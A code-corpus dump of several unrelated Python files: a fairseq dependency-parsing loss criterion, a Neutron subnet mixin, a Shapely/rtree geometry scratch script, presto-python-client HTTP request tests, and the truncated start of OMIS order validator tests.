jayten42/pororo
|
0b02e6a633b9a32ec4241b8ed96745e6592db317
|
[
"Apache-2.0"
] | 216
|
2021-02-02T02:49:02.000Z
|
2022-03-28T01:19:58.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates and Kakao Brain. All Rights Reserved
import math
import torch
import torch.nn.functional as F
from fairseq import utils
from fairseq.criterions import FairseqCriterion, register_criterion
@register_criterion("dependency_parse")
class DependencyParseLabelCriterion(FairseqCriterion):
def __init__(self, args, task):
super().__init__(args, task)
self.classification_head_name = args.classification_head_name
@staticmethod
def add_args(parser):
# fmt: off
parser.add_argument(
"--classification-head-name",
default="dependency_parse_head",
help="name of the classification head to use",
)
# fmt: on
def forward(self, model, sample, reduce=True):
"""Compute the loss for the given sample.
Returns a tuple with three elements:
1) the loss
        2) the sample size, which is used as the denominator for the gradient
3) logging outputs to display while training
"""
assert (
hasattr(model, "classification_heads") and
self.classification_head_name in model.classification_heads
), "model must provide sentence classification head for --criterion=dependency_parse_head"
# extract features from backbone module
features, _ = model(
**sample["net_input"],
**sample["segments"],
features_only=True,
)
masks = sample["net_input"]["src_tokens"] == 1
# forward extracted features to get label and head logits
# yapf: disable
head_logits, label_logits = model.classification_heads[self.classification_head_name](
features,
masks,
)
# yapf: enable
# calculate head loss
head_targets = sample["target0"].view(-1)
head_logits = head_logits.view(-1, head_logits.size(-1))
head_logits = head_logits[head_targets != 0]
head_targets = head_targets[head_targets != 0]
head_loss = F.nll_loss(
F.log_softmax(head_logits, dim=-1, dtype=torch.float32),
head_targets,
ignore_index=-1,
)
masked_preds = head_logits[head_targets != -1].argmax(dim=1)
masked_targets = head_targets[head_targets != -1]
head_ncorrect = utils.item((masked_preds == masked_targets).sum())
sample_size = masked_targets.size(0)
# calculate label loss
label_targets = sample["target1"].view(-1)
label_logits = label_logits.view(-1, label_logits.size(-1))
label_logits = label_logits[label_targets != 0]
label_targets = label_targets[label_targets != 0]
label_loss = F.nll_loss(
F.log_softmax(label_logits, dim=-1, dtype=torch.float32),
label_targets,
ignore_index=-1,
)
masked_preds = label_logits[label_targets != -1].argmax(dim=1)
masked_targets = label_targets[label_targets != -1]
label_ncorrect = utils.item((masked_preds == masked_targets).sum())
loss = label_loss + head_loss
logging_output = {
"sample_size": sample_size,
"ntokens": sample["ntokens"],
"nsentences": sample["target0"].size(0),
"loss": utils.item(loss.data),
"head_loss": utils.item(head_loss.data),
"label_loss": utils.item(label_loss.data),
"head_ncorrect": head_ncorrect,
"label_ncorrect": label_ncorrect,
}
return loss, sample_size, logging_output
@staticmethod
def aggregate_logging_outputs(logging_outputs):
"""Aggregate logging outputs from data parallel training."""
loss_sum = utils.item(sum(
log.get("loss", 0) for log in logging_outputs))
label_loss_sum = utils.item(
sum(log.get("label_loss", 0) for log in logging_outputs))
head_loss_sum = utils.item(
sum(log.get("head_loss", 0) for log in logging_outputs))
ntokens = utils.item(
sum(log.get("ntokens", 0) for log in logging_outputs))
nsentences = utils.item(
sum(log.get("nsentences", 0) for log in logging_outputs))
sample_size = utils.item(
sum(log.get("sample_size", 0) for log in logging_outputs))
nll_loss = loss_sum / ntokens / math.log(2)
label_loss = label_loss_sum / sample_size / math.log(2)
head_loss = head_loss_sum / sample_size / math.log(2)
agg_output = {
"loss": loss_sum / sample_size / math.log(2),
"label_loss": label_loss,
"head_loss": head_loss,
"ntokens": ntokens,
"nsentences": nsentences,
"sample_size": sample_size,
"nll_loss": nll_loss,
}
if len(logging_outputs) > 0 and "head_ncorrect" in logging_outputs[0]:
head_ncorrect = sum(
log.get("head_ncorrect", 0) for log in logging_outputs)
head_accuracy = (head_ncorrect / sample_size) * 100
agg_output.update(head_accuracy=head_accuracy)
if len(logging_outputs) > 0 and "label_ncorrect" in logging_outputs[0]:
label_ncorrect = sum(
log.get("label_ncorrect", 0) for log in logging_outputs)
label_accuracy = (label_ncorrect / sample_size) * 100
agg_output.update(label_accuracy=label_accuracy)
return agg_output
@staticmethod
def logging_outputs_can_be_summed() -> bool:
"""
Whether the logging outputs returned by `forward` can be summed
across workers prior to calling `reduce_metrics`. Setting this
        to True will improve distributed training speed.
"""
return True
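# --- Illustrative sketch (not part of the original module): the padding-mask pattern
# used in `forward` above, on toy tensors. A target of 0 marks a padded position and
# is dropped before the NLL loss and before counting correct predictions.
def _example_masked_nll():  # pragma: no cover
    logits = torch.randn(6, 4)                   # 6 positions, 4 candidate classes
    targets = torch.tensor([2, 0, 1, 0, 3, 2])   # 0 = padding
    logits = logits[targets != 0]
    targets = targets[targets != 0]
    loss = F.nll_loss(
        F.log_softmax(logits, dim=-1, dtype=torch.float32),
        targets,
    )
    ncorrect = utils.item((logits.argmax(dim=1) == targets).sum())
    return loss, ncorrect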
| 36.198758
| 98
| 0.622169
|
60f2be95a6973df01fb504c83bffb400ffb91254
| 1,324
|
py
|
Python
|
neutron/db/subnet_service_type_db_models.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | 1
|
2019-06-02T06:15:39.000Z
|
2019-06-02T06:15:39.000Z
|
neutron/db/subnet_service_type_db_models.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | null | null | null |
neutron/db/subnet_service_type_db_models.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Hewlett Packard Enterprise Development Company, LP
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# TODO(ihrachys): consider renaming the module since now it does not contain
# any models at all
from neutron.api.v2 import attributes
from neutron.db import _resource_extend as resource_extend
class SubnetServiceTypeMixin(object):
"""Mixin class to extend subnet with service type attribute"""
def _extend_subnet_service_types(self, subnet_res, subnet_db):
subnet_res['service_types'] = [service_type['service_type'] for
service_type in
subnet_db.service_types]
resource_extend.register_funcs(
attributes.SUBNETS, [_extend_subnet_service_types])
| 40.121212
| 78
| 0.712991
|
11638d56f883607eac81074f3f11f6bf4d2aea1f
| 5,715
|
py
|
Python
|
.ipynb_checkpoints/test-checkpoint.py
|
ymoisan/GeoSim
|
84f1482c885d7d3b1e07b92dee9580e4bcacf9cb
|
[
"MIT"
] | null | null | null |
.ipynb_checkpoints/test-checkpoint.py
|
ymoisan/GeoSim
|
84f1482c885d7d3b1e07b92dee9580e4bcacf9cb
|
[
"MIT"
] | null | null | null |
.ipynb_checkpoints/test-checkpoint.py
|
ymoisan/GeoSim
|
84f1482c885d7d3b1e07b92dee9580e4bcacf9cb
|
[
"MIT"
] | null | null | null |
from shapely.geometry import LineString, Point, Polygon, MultiLineString
from shapely.strtree import STRtree
import math
import random, time
from rtree import index
from cmath import rect, phase
from math import radians, degrees
from shapely.ops import polygonize, polygonize_full, split
line = LineString(((0,0),(5,0),(10,0)))
a = line.project(Point(5,10))
ext = [(0,0), (0,10),(3,10),(3,14),(7,14),(7,10),(10,10), (10,0),(0,0)]
int_1 = [[(4,11), (4,12),(6,12),(6,11), (4,11)]]
int_2 = [[(4,9.5), (4,10.5),(6,10.5),(6,9.5), (4,9.5)]]
pol = Polygon(ext, int_1)
val = pol.is_valid
pol_s = pol.simplify(5, preserve_topology=True)
val = pol.is_simple
pol = Polygon(ext, int_2)
val = pol.is_valid
pol_s = pol.simplify(5, preserve_topology=True)
pol_s1 = pol.simplify(5, preserve_topology=False)
val2 = pol_s1.is_valid
pol = Polygon([(0,0), (0,10), (10,10), (10,12), (12,12), (12,10), (20,10)])
mline = MultiLineString([((0,10),(10,10), (10,12), (12,12), (12,10), (20,10)), ((11,0), (11,4),(12,4),(12,5),(11,5), (11,7), (11,11))])
mline1 = mline.simplify(2, preserve_topology=True)
line = LineString([(0,0),(10,0), (11,0), (11,1), (10,1), (20,0), (20,1), (22,1), (22,0), (30, 0), (30,-5), (21,-5), (21,.5)])
line1 = line.simplify(1, preserve_topology=True)
line = LineString([(0,0),(2,2), (4,-2), (6,2), (7,0), (8,0)])
splitter = LineString([(0,0),(8,0)])
line_a = LineString([(0,0),(10,0)])
line_b = LineString([(10,110),(20,20)])
line_c = LineString([(7,0),(9,0)])
line_split = split(line, splitter)
splitter_split = split(splitter, line)
pol = polygonize_full([line_split, splitter_split])
val_a = line_a.intersects(pol[0])
val_b = line_b.intersects(pol[0])
val_c = line_c.intersects(pol[0])
coords = [(0, 0), (0, 2), (1, 1), (2, 2), (2, 0), (1, 1), (0, 0)]
coords = [(0,0),(5,0), (10,0), (10,10), (5,10), (5,0), (5,-10),(0,-10), (0,0)]
bowtie = Polygon(coords)
va11 = bowtie.is_valid
clean = bowtie.buffer(0)
val2 = clean.is_valid
l_a = [(0,0),(1,3),(2,-3),(10,10), (0,0)]
pol = Polygon (l_a)
pol1 = pol.buffer(0)
l_b = [(0,0),(10,10)]
line_a = LineString(l_a)
line_b = LineString(l_b)
p = polygonize_full([line_a,line_b])
p0 = [(0,0),(10,0),(10,10),(0,10),(0,0)]
p1 = [(0,10),(10,10),(10,20),(0,20),(0,10)]
p2 = [(0,0),(20,20),(-5,20),(-5,17),(5,17),(5,12),(-5,12),(0,0)]
pol1 = Polygon(p1)
pol2 = Polygon(p2)
pols = pol1.symmetric_difference(pol2)
p1 = [(0,0),(10,0),(10,10),(0,10),(0,0)]
p2 = [(2,2),(8,2),(8,8),(2,8),(2,2)]
pol1 = Polygon(p1)
pol2 = Polygon(p2)
pols1 = pol1.symmetric_difference(pol2)
pols2 = pol2.symmetric_difference(pol1)
p1 = [(0,0),(7,0),(7,7),(0,7),(0,0)]
p2 = p1 = [(0,10),(10,10),(10,20),(0,20),(0,10)]
pol1 = Polygon(p1)
pol2 = Polygon(p2)
pols1 = pol1.symmetric_difference(pol2)
pols2 = pol2.symmetric_difference(pol1)
0/0
0/0
def mean_angle(deg):
a = None
# a = sum(rect(1, radians(d)) for d,l in deg)
for d,ll in deg:
if a is None:
a = rect(ll, radians(d))
else:
a += rect(ll, radians(d))
b = phase(a)
c = degrees(b)
d = degrees(phase(sum(rect(l, radians(d)) for d,l in deg)/len(deg)))
return (c,d)
def mean_angle2(deg_len_pairs):
    # Length-weighted circular mean of (angle_in_degrees, length) pairs: each pair
    # contributes a vector of magnitude `length`; the mean angle is the phase of the sum.
    angle_sum = sum(rect(length, radians(deg)) for deg, length in deg_len_pairs)
    return degrees(phase(angle_sum))
for angles in [[(350,1000), (10,1)], [(90,1), (180,1), (270,1), (360,1)], [(10,10), (20,1), (30,1)]]:
print('The mean angle of', angles, 'is:', round(mean_angle(angles)[0], 12), 'degrees')
#for angles in [[(350,2), (10,4)], [(90,2), (180,2), (270,2), (360,2)], [(10,1), (20,2), (30,3)]]:
# print('The mean angle of', angles, 'is:', round(mean_angle2(angles), 12), 'degrees')
0/0
for xy in [(1,.1),(1,1),(0.1,1),(-0.1,1),(-1,1),(-1,-1),(1,-1)]:
line0 = LineString([(0,0), xy])
line1 = LineString([xy, (0,0)])
for line in (line0,line1):
x0, y0 = line.coords[0][0], line.coords[0][1]
x1, y1 = line.coords[1][0], line.coords[1][1]
delta_y = (y1 - y0)
delta_x = (x1 - x0)
angle = math.atan(delta_y / delta_x)
angle = math.degrees(angle)
print (x0, y0, x1, y1, angle)
0/0
# Create the triangles
lst_lines = []
for i in range(250000):
x = random.random() * 10000.
y = random.random() * 10000.
coords = [(x,y),(x+5, y+5),(x,y+10),(x,y)]
lst_lines.append(LineString(coords))
# Create the bounding boxes
lst_intersects = []
for i in range(10000):
x = random.random() * 10000.
y = random.random() * 10000.
coords = [(x,y),(x+15,y),(x+15,y+15),(x,y+15),(x,y)]
lst_intersects.append(LineString(coords))
# Create shapely STRtree
tree = STRtree(lst_lines)
# Create RTree
idx = index.Index()
for i, line in enumerate(lst_lines):
idx.insert(i, line.bounds)
print (time.time())
sec1 = time.time()
# Find the intersections with STRtree
str_tree_nbr = 0
for intersect in lst_intersects:
str_tree = tree.query(intersect)
str_tree_nbr += len(str_tree)
sec2 = time.time()
print("Seconds for STRtree =", sec2-sec1)
print ("Str tree number: ", str_tree_nbr)
# Find the intersections with RTree
rtree_nbr = 0
for intersect in lst_intersects:
rtree = idx.intersection(intersect.bounds)
rtree_nbr += len(list(rtree))
sec3 = time.time()
print("Seconds for RTree =", sec3-sec2)
print ("Rtree number: ", rtree_nbr)
| 26.830986
| 135
| 0.59825
|
303121c189311850a6b0aaba7bf2fa8a68b516a6
| 19,860
|
py
|
Python
|
tests/test_client.py
|
highker/presto-python-client
|
4f5be9c81950cbddd4579a9e55dfce6db54fb8b2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_client.py
|
highker/presto-python-client
|
4f5be9c81950cbddd4579a9e55dfce6db54fb8b2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_client.py
|
highker/presto-python-client
|
4f5be9c81950cbddd4579a9e55dfce6db54fb8b2
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import httpretty
import pytest
import requests
import socket
import time
from requests_kerberos.exceptions import KerberosExchangeError
from prestodb.client import PrestoRequest
from prestodb import constants
import prestodb.exceptions
"""
This is the response to the first HTTP request (a POST) from an actual
Presto session. It is deliberately left untruncated to document such a response
and to allow reusing it in other tests.
To get some HTTP response, set logging level to DEBUG with
``logging.basicConfig(level=logging.DEBUG)`` or
``prestodb.client.logger.setLevel(logging.DEBUG)``.
::
    >>> from prestodb import dbapi
>>> import logging
>>> import prestodb.client
>>> prestodb.client.logger.setLevel(logging.DEBUG)
>>> conn = dbapi.Connection('localhost', 8080, 'ggreg', 'test')
>>> cur = conn.cursor()
>>> res = cur.execute('select * from system.runtime.nodes')
"""
RESP_DATA_POST_0 = {
'nextUri': 'coordinator:8080/v1/statement/20161115_222658_00040_xtnym/1',
'id': '20161115_222658_00040_xtnym',
'taskDownloadUris': [],
'infoUri': 'http://coordinator:8080/query.html?20161115_222658_00040_xtnym',
'stats': {
'scheduled': False,
'runningSplits': 0,
'processedRows': 0,
'queuedSplits': 0,
'processedBytes': 0,
'state': 'QUEUED',
'completedSplits': 0,
'queued': True,
'cpuTimeMillis': 0,
'totalSplits': 0,
'nodes': 0,
'userTimeMillis': 0,
'wallTimeMillis': 0,
},
}
"""
This is the response to the second HTTP request (a GET) from an actual
Presto session. It is deliberately left untruncated to document such a response
and to allow reusing it in other tests. After doing the steps above, do:
::
>>> cur.fetchall()
"""
RESP_DATA_GET_0 = {
'id': '20161116_195728_00000_xtnym',
'nextUri': 'coordinator:8080/v1/statement/20161116_195728_00000_xtnym/2',
'data': [
['UUID-0', 'http://worker0:8080', '0.157', False, 'active'],
['UUID-1', 'http://worker1:8080', '0.157', False, 'active'],
['UUID-2', 'http://worker2:8080', '0.157', False, 'active'],
],
'columns': [{
'name': 'node_id',
'type': 'varchar',
'typeSignature': {
'typeArguments': [],
'arguments': [{
'kind': 'LONG_LITERAL',
'value': 2147483647}
],
'literalArguments': [],
'rawType': 'varchar',
}
}, {
'name': 'http_uri',
'type': 'varchar',
'typeSignature': {
'typeArguments': [],
'arguments': [{
'kind': 'LONG_LITERAL',
'value': 2147483647,
}],
'literalArguments': [],
'rawType': 'varchar',
}
}, {
'name': 'node_version',
'type': 'varchar',
'typeSignature': {
'typeArguments': [],
'arguments': [{
'kind': 'LONG_LITERAL',
'value': 2147483647,
}],
'literalArguments': [],
'rawType': 'varchar',
}
}, {
'name': 'coordinator',
'type': 'boolean',
'typeSignature': {
'typeArguments': [],
'arguments': [],
'literalArguments': [],
'rawType': 'boolean',
}
}, {
'name': 'state',
'type': 'varchar',
'typeSignature': {
'typeArguments': [],
'arguments': [{
'kind': 'LONG_LITERAL',
'value': 2147483647,
}],
'literalArguments': [],
'rawType': 'varchar',
}
}],
'taskDownloadUris': [],
'partialCancelUri': 'http://localhost:8080/v1/stage/20161116_195728_00000_xtnym.0', # NOQA
'stats': {
'nodes': 2,
'processedBytes': 880,
'scheduled': True,
'completedSplits': 2,
'userTimeMillis': 0,
'state': 'RUNNING',
'rootStage': {
'nodes': 1,
'done': False,
'processedBytes': 1044,
'subStages': [{
'nodes': 1,
'done': True,
'processedBytes': 880,
'subStages': [],
'completedSplits': 1,
'userTimeMillis': 0,
'state': 'FINISHED',
'cpuTimeMillis': 3,
'runningSplits': 0,
'totalSplits': 1,
'processedRows': 8,
'stageId': '1',
'queuedSplits': 0,
'wallTimeMillis': 27,
}],
'completedSplits': 1,
'userTimeMillis': 0,
'state': 'RUNNING',
'cpuTimeMillis': 1,
'runningSplits': 0,
'totalSplits': 1,
'processedRows': 8,
'stageId': '0',
'queuedSplits': 0,
'wallTimeMillis': 9,
},
'queued': False,
'cpuTimeMillis': 3,
'runningSplits': 0,
'totalSplits': 2,
'processedRows': 8,
'queuedSplits': 0,
'wallTimeMillis': 36,
},
'infoUri': 'http://coordinator:8080/query.html?20161116_195728_00000_xtnym', # NOQA
}
RESP_ERROR_GET_0 = {
'error': {
'errorCode': 1,
'errorLocation': {'columnNumber': 15, 'lineNumber': 1},
'errorName': 'SYNTAX_ERROR',
'errorType': 'USER_ERROR',
'failureInfo': {
'errorLocation': {'columnNumber': 15, 'lineNumber': 1},
'message': 'line 1:15: Schema must be specified '
'when session schema is not set',
'stack': [
'com.facebook.presto.metadata.MetadataUtil.lambda$createQualifiedObjectName$2(MetadataUtil.java:133)',
'java.util.Optional.orElseThrow(Optional.java:290)',
'com.facebook.presto.metadata.MetadataUtil.createQualifiedObjectName(MetadataUtil.java:132)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitTable(StatementAnalyzer.java:529)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitTable(StatementAnalyzer.java:166)',
'com.facebook.presto.sql.tree.Table.accept(Table.java:50)',
'com.facebook.presto.sql.tree.AstVisitor.process(AstVisitor.java:22)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.analyzeFrom(StatementAnalyzer.java:1413)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitQuerySpecification(StatementAnalyzer.java:670)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitQuerySpecification(StatementAnalyzer.java:166)',
'com.facebook.presto.sql.tree.QuerySpecification.accept(QuerySpecification.java:125)',
'com.facebook.presto.sql.tree.AstVisitor.process(AstVisitor.java:22)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitQuery(StatementAnalyzer.java:438)',
'com.facebook.presto.sql.analyzer.StatementAnalyzer.visitQuery(StatementAnalyzer.java:166)',
'com.facebook.presto.sql.tree.Query.accept(Query.java:92)',
'com.facebook.presto.sql.tree.AstVisitor.process(AstVisitor.java:22)',
'com.facebook.presto.sql.analyzer.Analyzer.analyze(Analyzer.java:67)',
'com.facebook.presto.sql.analyzer.Analyzer.analyze(Analyzer.java:59)',
'com.facebook.presto.execution.SqlQueryExecution.doAnalyzeQuery(SqlQueryExecution.java:285)',
'com.facebook.presto.execution.SqlQueryExecution.analyzeQuery(SqlQueryExecution.java:271)',
'com.facebook.presto.execution.SqlQueryExecution.start(SqlQueryExecution.java:229)',
'com.facebook.presto.execution.QueuedExecution.lambda$start$1(QueuedExecution.java:62)',
'java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)',
'java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)',
'java.lang.Thread.run(Thread.java:745)',
],
'suppressed': [],
'type': 'com.facebook.presto.sql.analyzer.SemanticException',
},
'message': 'line 1:15: Schema must be specified when session schema is not set',
},
'id': '20161116_205844_00002_xtnym',
'infoUri': 'http://test02.presto.data.facebook.com:7777/query.html?20161116_205844_00002_xtnym',
'stats': {'completedSplits': 0,
'cpuTimeMillis': 0,
'nodes': 0,
'processedBytes': 0,
'processedRows': 0,
'queued': False,
'queuedSplits': 0,
'runningSplits': 0,
'scheduled': False,
'state': 'FAILED',
'totalSplits': 0,
'userTimeMillis': 0,
'wallTimeMillis': 0,
},
'taskDownloadUris': [],
}
def get_json_post_0(self):
return RESP_DATA_POST_0
def get_json_get_0(self):
return RESP_DATA_GET_0
def get_json_get_error_0(self):
return RESP_ERROR_GET_0
def test_presto_initial_request(monkeypatch):
monkeypatch.setattr(PrestoRequest.http.Response, 'json', get_json_post_0)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
source='test',
catalog='test',
schema='test',
http_scheme='http',
session_properties={},
)
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 200
status = req.process(http_resp)
assert status.next_uri == RESP_DATA_POST_0['nextUri']
assert status.id == RESP_DATA_POST_0['id']
class ArgumentsRecorder(object):
def __init__(self):
# Prevent functools.wraps from complaining when it decorates the
# instance.
self.__name__ = 'ArgumentsRecorder'
self.args = None
self.kwargs = None
def __call__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def test_request_headers(monkeypatch):
post_recorder = ArgumentsRecorder()
monkeypatch.setattr(PrestoRequest.http.Session, 'post', post_recorder)
get_recorder = ArgumentsRecorder()
monkeypatch.setattr(PrestoRequest.http.Session, 'get', get_recorder)
catalog = 'test_catalog'
schema = 'test_schema'
user = 'test_user'
source = 'test_source'
accept_encoding_header = 'accept-encoding'
accept_encoding_value = 'identity,deflate,gzip'
client_info_header = constants.HEADER_PREFIX + 'Client-Info'
client_info_value = 'some_client_info'
req = PrestoRequest(
host='coordinator',
port=8080,
user=user,
source=source,
catalog=catalog,
schema=schema,
http_scheme='http',
session_properties={},
http_headers={
accept_encoding_header: accept_encoding_value,
client_info_header: client_info_value,
},
redirect_handler=None,
)
def assert_headers(headers):
assert headers[constants.HEADER_CATALOG] == catalog
assert headers[constants.HEADER_SCHEMA] == schema
assert headers[constants.HEADER_SOURCE] == source
assert headers[constants.HEADER_USER] == user
assert headers[constants.HEADER_SESSION] == ''
assert headers[accept_encoding_header] == accept_encoding_value
assert headers[client_info_header] == client_info_value
assert len(headers.keys()) == 8
req.post('URL')
assert_headers(post_recorder.kwargs['headers'])
req.get('URL')
assert_headers(get_recorder.kwargs['headers'])
def test_request_invalid_http_headers():
with pytest.raises(ValueError) as value_error:
PrestoRequest(
host='coordinator',
port=8080,
user='test',
http_headers={constants.HEADER_USER: 'invalid_header'},
)
assert str(value_error.value).startswith('cannot override reserved HTTP header')
def test_request_timeout():
timeout = 0.1
http_scheme = 'http'
host = 'coordinator'
port = 8080
url = http_scheme + '://' + host + ':' + str(port) + constants.URL_STATEMENT_PATH
def long_call(request, uri, headers):
time.sleep(timeout * 2)
return (200, headers, "delayed success")
httpretty.enable()
for method in [httpretty.POST, httpretty.GET]:
httpretty.register_uri(method, url, body=long_call)
# timeout without retry
for request_timeout in [timeout, (timeout, timeout)]:
req = PrestoRequest(
host=host,
port=port,
user='test',
http_scheme=http_scheme,
max_attempts=1,
request_timeout=request_timeout,
)
with pytest.raises(requests.exceptions.Timeout):
req.get(url)
with pytest.raises(requests.exceptions.Timeout):
req.post('select 1')
httpretty.disable()
httpretty.reset()
def test_presto_fetch_request(monkeypatch):
monkeypatch.setattr(PrestoRequest.http.Response, 'json', get_json_get_0)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
source='test',
catalog='test',
schema='test',
http_scheme='http',
session_properties={},
)
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 200
status = req.process(http_resp)
assert status.next_uri == RESP_DATA_GET_0['nextUri']
assert status.id == RESP_DATA_GET_0['id']
assert status.rows == RESP_DATA_GET_0['data']
def test_presto_fetch_request_with_cookie(monkeypatch):
monkeypatch.setattr(PrestoRequest.http.Response, 'json', get_json_get_0)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
source='test',
catalog='test',
schema='test',
http_scheme='http',
session_properties={},
)
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 200
http_resp.cookies['key'] = 'value'
req.process(http_resp)
assert req._http_cookies['key'] == 'value'
def test_presto_fetch_error(monkeypatch):
monkeypatch.setattr(
PrestoRequest.http.Response,
'json',
get_json_get_error_0,
)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
source='test',
catalog='test',
schema='test',
http_scheme='http',
session_properties={},
)
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 200
with pytest.raises(prestodb.exceptions.PrestoUserError) as exception_info:
req.process(http_resp)
error = exception_info.value
assert error.error_code == 1
assert error.error_name == 'SYNTAX_ERROR'
assert error.error_type == 'USER_ERROR'
assert error.error_exception == 'com.facebook.presto.sql.analyzer.SemanticException'
assert 'stack' in error.failure_info
assert len(error.failure_info['stack']) == 25
assert 'suppressed' in error.failure_info
assert error.message == 'line 1:15: Schema must be specified when session schema is not set'
assert error.error_location == (1, 15)
assert error.query_id == '20161116_205844_00002_xtnym'
@pytest.mark.parametrize("error_code, error_type, error_message", [
(503, prestodb.exceptions.Http503Error, 'service unavailable'),
(404, prestodb.exceptions.HttpError, 'error 404'),
])
def test_presto_connection_error(monkeypatch, error_code, error_type, error_message):
monkeypatch.setattr(
PrestoRequest.http.Response,
'json',
lambda x: {},
)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
source='test',
catalog='test',
schema='test',
http_scheme='http',
session_properties={},
)
http_resp = PrestoRequest.http.Response()
http_resp.status_code = error_code
with pytest.raises(error_type) as error:
req.process(http_resp)
assert error_message in str(error)
class RetryRecorder(object):
def __init__(self, error=None, result=None):
self.__name__ = 'RetryRecorder'
self._retry_count = 0
self._error = error
self._result = result
def __call__(self, *args, **kwargs):
self._retry_count += 1
if self._error is not None:
raise self._error
if self._result is not None:
return self._result
@property
def retry_count(self):
return self._retry_count
def test_authentication_fail_retry(monkeypatch):
post_retry = RetryRecorder(error=KerberosExchangeError())
monkeypatch.setattr(PrestoRequest.http.Session, 'post', post_retry)
get_retry = RetryRecorder(error=KerberosExchangeError())
monkeypatch.setattr(PrestoRequest.http.Session, 'get', get_retry)
attempts = 3
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
max_attempts=attempts,
)
with pytest.raises(KerberosExchangeError):
req.post('URL')
assert post_retry.retry_count == attempts
with pytest.raises(KerberosExchangeError):
req.get('URL')
assert post_retry.retry_count == attempts
def test_503_error_retry(monkeypatch):
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 503
post_retry = RetryRecorder(result=http_resp)
monkeypatch.setattr(PrestoRequest.http.Session, 'post', post_retry)
get_retry = RetryRecorder(result=http_resp)
monkeypatch.setattr(PrestoRequest.http.Session, 'get', get_retry)
attempts = 3
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
max_attempts=attempts,
)
req.post('URL')
assert post_retry.retry_count == attempts
req.get('URL')
assert post_retry.retry_count == attempts
class FakeGatewayResponse(object):
def __init__(self, http_response, redirect_count=1):
self.__name__ = 'FakeGatewayResponse'
self.http_response = http_response
self.redirect_count = redirect_count
self.count = 0
def __call__(self, *args, **kwargs):
self.count += 1
if self.count == self.redirect_count:
return self.http_response
http_response = PrestoRequest.http.Response()
http_response.status_code = 301
http_response.headers['Location'] = 'http://1.2.3.4:8080/new-path/'
assert http_response.is_redirect
return http_response
def test_gateway_redirect(monkeypatch):
http_resp = PrestoRequest.http.Response()
http_resp.status_code = 200
gateway_response = FakeGatewayResponse(http_resp, redirect_count=3)
monkeypatch.setattr(PrestoRequest.http.Session, 'post', gateway_response)
monkeypatch.setattr(
socket,
'gethostbyaddr',
lambda *args: ('finalhost', ['finalhost'], '1.2.3.4'),
)
req = PrestoRequest(
host='coordinator',
port=8080,
user='test',
)
result = req.post('http://host:80/path/')
assert gateway_response.count == 3
assert result.ok
| 32.292683
| 121
| 0.620493
|
be0a8311d1c083503acc97fd3cdf6cfc9ded10ed
| 24,756
|
py
|
Python
|
datahub/omis/order/test/test_validators.py
|
alixedi/data-hub-api-cd-poc
|
a5e5ea45bb496c0d2a06635864514af0c7d4291a
|
[
"MIT"
] | null | null | null |
datahub/omis/order/test/test_validators.py
|
alixedi/data-hub-api-cd-poc
|
a5e5ea45bb496c0d2a06635864514af0c7d4291a
|
[
"MIT"
] | null | null | null |
datahub/omis/order/test/test_validators.py
|
alixedi/data-hub-api-cd-poc
|
a5e5ea45bb496c0d2a06635864514af0c7d4291a
|
[
"MIT"
] | null | null | null |
from unittest import mock
import pytest
from django.db.models import Sum
from rest_framework.exceptions import ValidationError
from datahub.core.exceptions import APIConflictException
from datahub.omis.order.constants import OrderStatus, VATStatus
from datahub.omis.order.models import Order
from datahub.omis.order.test.factories import (
OrderFactory,
OrderWithCancelledQuoteFactory,
OrderWithOpenQuoteFactory,
)
from datahub.omis.order.validators import (
AssigneesFilledInSubValidator,
CancellableOrderSubValidator,
CompletableOrderSubValidator,
ContactWorksAtCompanyValidator,
NoOtherActiveQuoteExistsSubValidator,
OrderDetailsFilledInSubValidator,
OrderEditableFieldsValidator,
OrderInStatusRule,
OrderInStatusSubValidator,
OrderInStatusValidator,
VATSubValidator,
)
class TestContactWorksAtCompanyValidator:
"""Tests for ContactWorksAtCompanyValidator."""
def test_contact_from_company(self):
"""
Test that if the contact specified in data works
at the company specified in data, the validation passes.
"""
